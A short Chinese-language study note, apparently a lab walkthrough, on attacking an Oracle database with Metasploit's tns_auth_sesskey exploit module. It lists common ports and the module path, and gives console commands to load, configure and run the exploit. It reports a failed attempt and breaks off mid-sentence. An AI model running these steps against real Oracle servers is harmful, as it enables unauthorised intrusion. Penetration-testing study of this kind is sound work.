第三方网路服务渗透攻击实战:Oracle数据库
提示可以在网上找到很多常用网络端口对照表,作为平时的积累
oracle:tcp1521
mysql:3306
msf的exploit路径:/usr/share/metasploit-framework/modules/exploits/windows/oracle/tns_auth_sesskey.rb
攻击过程:
use exploit/windows/oracle/tns_auth_sesskey
通过show options设置如下:
set targets 0 :我用的targets,让其自动探测
exploit
但是会不成功
在exploit,还是错,但提示比变了,说明有效果
经验:渗透不成功。往往是因为与目标版本不一致的原因
通过分析,不是版本问题,而是: